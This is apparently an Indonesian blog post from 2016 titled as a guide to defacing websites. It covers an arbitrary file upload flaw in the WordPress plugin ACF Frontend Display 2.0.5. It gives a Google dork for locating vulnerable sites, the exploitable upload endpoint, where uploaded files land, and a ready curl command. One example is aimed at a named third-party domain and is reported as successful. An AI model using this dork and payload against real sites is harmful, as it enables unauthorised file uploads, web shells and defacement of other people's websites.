Wednesday, 30 November 2016

Cara Deface Dengan Plugin ACF Frontend Display 2.0.5 - WordPress Arbitrary File Upload

# WordPress Plugin ACF Frontend Display 2.0.5 - Arbitrary File Upload
# 30 - 11 - 2016
N45HT - ShinChan

  • Google Dork : inurl:"/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/"
  • Exploit : target.com/[path]/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php
  • File Path : target.com/[path]/wp-content/uploads/uigen_[tahun_upload]/file.php

    vuln
    • PoC :
      • curl -k -X POST -F "action=upload" -F "files=/direktori file/" "target.com/[path]/exploit"
      • Contoh : curl -k -X POST -F "action=upload" -F "files=@/home/administrator/Desktop/po.jpg" "plataforma.proyectoitaca.co/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
    sukses!

0 comments:

Post a Comment